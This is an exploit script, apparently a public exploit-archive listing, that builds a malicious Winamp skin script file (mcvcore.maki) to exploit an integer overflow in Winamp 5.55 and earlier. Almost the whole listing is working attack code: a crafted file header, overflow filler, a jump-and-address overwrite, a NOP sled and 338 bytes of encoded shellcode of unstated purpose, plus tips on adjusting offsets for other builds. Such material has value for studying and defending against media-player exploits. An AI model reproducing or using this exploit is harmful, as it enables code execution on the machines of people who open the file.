
# Title : Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
# Published : 2009-05-22
# Author : Encrypt3d.M!nd


# Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
# By: Encrypt3d.M!nd
#
# Based on: http://milw0rm.com/exploits/8767
#
# Place the generated "mcvcore.maki" in Winamp's skin script directory
# ("Winamp\Skins\Bento\scripts" under the install folder) and start Winamp.
# Run this only in an isolated lab VM: the file carries a payload whose
# behaviour is not described in this listing.
#
# NOTE: tested against Winamp 5.51 only. If it does not fire on another
#       build, re-derive the filler lengths (the `chars` calculation below)
#       for that build's layout.
#

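# Compiled-MAKI file prologue (688 bytes) copied verbatim from the reference
# exploit (milw0rm 8767).  It starts with the 0x46 0x47 ("FG") magic; the
# remaining bytes are opaque here and are reproduced as-is.
#
# This is a bytes literal (Python 2.6+/3) and every element is an explicit
# \xNN escape: the payload must reach the file byte-for-byte, and a plain
# text string would not survive Python 3 or Windows newline translation
# (note the 0x0D 0x0A pairs below).
header = (
    b"\x46\x47\x03\x04\x17\x00\x00\x00\x2A\x00\x00\x00"
    b"\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5"
    b"\x32\x35\xF3\xE7\x64\x0F\xF5\xD6\xFA\x93\xB7\x49"
    b"\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9"
    b"\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC"
    b"\xB5\x3A\x02\xB2\x4D\x43\xA1\x4B\xBE\xAE\x59\x63"
    b"\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49"
    b"\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x36\x60\x38"
    b"\x1B\x46\xA7\x42\xAA\x75\xD8\x3F\x66\x67\xBF\x73"
    b"\xF4\x7A\x78\xF4\xBB\xB2\xF7\x4E\x9C\xFB\xE7\x4B"
    b"\xA9\xBE\xA8\x8D\x02\x0C\x37\x3A\xBF\x3C\x9F\x43"
    b"\x84\xF1\x86\x88\x5B\xCF\x1E\x36\xB6\x5B\x0C\x5D"
    b"\xE1\x7D\x1F\x4B\xA7\x0F\x8D\x16\x59\x94\x19\x41"
    b"\x99\xE1\xE3\x4E\x36\xC6\xEC\x4B\x97\xCD\x78\xBC"
    b"\x9C\x86\x28\xB0\xE5\x95\xBE\x45\x72\x20\x91\x41"
    b"\x93\x5C\xBB\x5F\xF9\xF1\x17\xFD\x4E\x6D\x90\x60"
    b"\x7E\x53\x2E\x48\xB0\x04\xCC\x94\x61\x88\x56\x72"
    b"\xC0\xBC\x3A\x40\x22\x6F\xD6\x4B\x8B\xA4\x10\xC8"
    b"\x29\x93\x25\x47\x4D\x3E\xAA\x97\xD0\xF4\xA8\x4F"
    b"\x81\x7B\x0D\x0A\xF2\x2A\x45\x49\x83\xFA\xBB\xE4"
    b"\x64\xF4\x81\xD9\x49\xB0\xC0\xA8\x5B\x2E\xC3\xBC"
    b"\xFD\x3F\x5E\xB6\x62\x5E\x37\x8D\x40\x8D\xEA\x76"
    b"\x81\x4A\xB9\x1B\x77\xBE\x97\x4F\xCE\xB0\x77\x19"
    b"\x4E\x99\x56\xD4\x98\x33\xC9\x6C\x27\x0D\x20\xC2"
    b"\xA8\xEB\x51\x2A\x4B\xBA\x7F\x5D\x4B\xC6\x5D\x4C"
    b"\x71\x38\xBA\x1E\x8D\x9E\x48\x3E\x48\xB9\x60\x8D"
    b"\x1F\x43\xC5\xC4\x05\x40\xC9\x08\x0F\x39\xAF\x23"
    b"\x4B\x80\xF3\xB8\xC4\x8F\x7E\xBB\x59\x72\x86\xAA"
    b"\xEF\x0E\x31\xFA\x41\xB7\xDC\x85\xA9\x52\x5B\xCB"
    b"\x4B\x44\x32\xFD\x7D\x51\x37\x7C\x4E\xBF\x40\x82"
    b"\xAE\x5F\x3A\xDC\x33\x15\xFA\xB9\x5A\x7D\x9A\x57"
    b"\x45\xAB\xC8\x65\x57\xA6\xC6\x7C\xA9\xCD\xDD\x8E"
    b"\x69\x1E\x8F\xEC\x4F\x9B\x12\xF9\x44\xF9\x09\xFF"
    b"\x45\x27\xCD\x64\x6B\x26\x5A\x4B\x4C\x8C\x59\xE6"
    b"\xA7\x0C\xF6\x49\x3A\xE4\x05\xCB\x6D\xC4\x8A\xC2"
    b"\x48\xB1\x93\x49\xF0\x91\x0E\xF5\x4A\xFF\xCF\xDC"
    b"\xB4\xFE\x81\xCC\x4B\x96\x1B\x72\x0F\xD5\xBE\x0F"
    b"\xFF\xE1\x8C\xE2\x01\x59\xB0\xD5\x11\x97\x9F\xE4"
    b"\xDE\x6F\x51\x76\x0D\x0A\xBD\xF8\xF0\x80\xA5\x1B"
    b"\xA6\x42\xA0\x93\x32\x36\xA0\x0C\x8D\x4A\x1B\x34"
    b"\x2E\x9B\x98\x6C\xFA\x40\x8B\x85\x0C\x1B\x6E\xE8"
    b"\x94\x05\x71\x9B\xD5\x36\xFD\x03\xF8\x4A\x97\x95"
    b"\x05\x02\xB7\xDB\x26\x7A\x10\xF2\xD5\x7F\xC4\xAC"
    b"\xDF\x48\xA6\xA0\x54\x51\x57\x6C\xDC\x76\x35\xA5"
    b"\xBA\xB5\xB3\x05\xCB\x4D\xAD\xC1\xE6\x18\xD2\x8F"
    b"\x68\x96\xC1\xFE\x29\x61\xB7\xDA\x51\x4D\x91\x65"
    b"\x01\xCA\x0C\x1B\x70\xDB\xF7\x14\x95\xD5\x36\xED"
    b"\xE8\x45\x98\x0F\x3F\x4E\xA0\x52\x2C\xD9\x82\x4B"
    b"\x3B\x9B\x7A\x66\x0E\x42\x8F\xFC\x79\x41\x15\x80"
    b"\x9C\x02\x99\x31\xED\xC7\x19\x53\x98\x47\x98\x63"
    b"\x60\xB1\x5A\x29\x8C\xAA\x4D\xC1\xBB\xE2\xF6\x84"
    b"\x73\x41\xBD\xB3\xB2\xEB\x2F\x66\x55\x50\x94\x05"
    b"\xC0\x73\x1F\x96\x1B\x40\x9B\x1B\x67\x24\x27\xAC"
    b"\x41\x65\x22\xBA\x3D\x59\x77\xD0\x76\x49\xB9\x52"
    b"\xF4\x71\x36\x55\x40\x0B\x82\x02\x03\xD4\xAB\x3A"
    b"\x87\x4D\x87\x8D\x12\x32\x6F\xAD\xFC\xD5\x83\xC2"
    b"\xDE\x24\x6E\xB7\x36\x4A\x8C\xCC\x9E\x24\xC4\x6B"
    b"\x6C\x73\x37\x00"
)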

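# Eleven 0xFF bytes written directly after the prologue.  Given the title,
# this run is presumably the oversized value that trips the integer
# overflow, but the MAKI field layout is not documented here -- verify
# against the format before changing its length.  Bytes literal, not text,
# so the 0xFF values are written verbatim.
ex = b"\xFF" * 11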

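# Payload (338 bytes).  It opens with the classic GetPC stub
# (jmp / call / pop ecx: \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff) followed
# by a printable-character decoder, which looks like a Metasploit-style
# alphanumeric-encoded payload; what it decodes to is not stated in this
# listing, so treat it as untrusted and run it only in an isolated lab.
# Bytes literal so that the \xNN escapes are written verbatim.
shellcode = (
    b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
    b"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32"
    b"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d"
    b"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c"
    b"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45"
    b"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36"
    b"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e"
    b"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a"
    b"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d"
    b"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74"
    b"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57"
    b"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38"
    b"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b"
    b"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77"
    b"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b"
    b"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53"
    b"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f"
    b"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31"
    b"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50"
    b"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37"
    b"\x70\x41"
)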


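# --- assemble and write mcvcore.maki ----------------------------------------
# File layout (offsets are the author's Winamp 5.51 numbers; see NOTE above):
#   header       688 bytes   compiled-MAKI prologue
#   ex            11 bytes   0xFF run
#   chars        301 bytes   filler -> next field starts at offset 1000
#   4 bytes                  \xeb\x12 = jmp short +0x12, \x41\x41 pad;
#                            the jump skips the pad, the 4-byte address and
#                            the first 12 NOPs, landing inside the sled
#   4 bytes                  0x14F01011 little-endian; this jmp + address
#                            pair looks like an nSEH/SEH overwrite inherited
#                            from the SEH variant this script is based on --
#                            confirm the address against the target module
#   20 bytes                 NOP sled
#   shellcode    338 bytes
#   chars2     16100 bytes   trailing filler
chars = b"A" * 301
chars2 = b"B" * 16100

payload = (
    header
    + ex
    + chars
    + b"\xeb\x12\x41\x41"
    + b"\x11\x10\xf0\x14"
    + b"\x90" * 20
    + shellcode
    + chars2
)

# Binary mode is mandatory: the payload contains 0x0A bytes (there are
# 0x0D 0x0A pairs inside `header`), and text mode on Windows would expand
# each 0x0A to "\r\n", shifting every offset computed above.  The context
# manager also guarantees the handle is flushed and closed on error.
with open("mcvcore.maki", "wb") as out:
    out.write(payload)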
